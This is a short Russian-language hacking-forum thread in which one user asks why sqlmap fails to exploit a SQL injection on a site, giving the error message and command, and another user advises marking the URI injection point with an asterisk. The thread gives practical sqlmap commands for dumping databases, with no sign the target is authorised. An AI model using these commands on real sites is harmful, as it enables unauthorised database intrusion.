[SQLmap] Не могу заюзать уязвимость

Discussion in 'Песочница' started by RedFern.89, 30 Sep 2015.

Thread Status:
Not open for further replies.
  1. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    575
    Likes Received:
    48
    Reputations:
    0
    SQLmap не может заюзать уязвимость хотя уязвимость есть

    test url: domain/1'"/
    пишет ошибку Ошибка базы данных. MySQL пишет:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    Команда к sqlmap

    --url=http://domain/1'"/ -p 1 --random-agent --level=5 --risk=3 --suffix=/ --dbs
    sqlmap выдает "heuristic (basic) test shows that URI parameter '#1*' might be injectable", но в итоге ничего не может сделать

    Подскажите, в чем здесь проблема ?
     
  2. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    106
    Likes Received:
    20
    Reputations:
    0
    -u "http://domain/1*/"
    sqlmap выдает "heuristic (basic) test shows that URI parameter '#1*' might be injectable"
    Читай что пишет sqlmap
    Когда урл такого типа то нужно подставить *
     
Loading...
Similar Threads - SQLmap заюзать уязвимость
  1. ivdos
    Replies:
    8
    Views:
    2,193
  2. 2fed
    Replies:
    1
    Views:
    2,152
  3. rozzet
    Replies:
    0
    Views:
    2,637
  4. firstnamel4stname
    Replies:
    2
    Views:
    1,790
Thread Status:
Not open for further replies.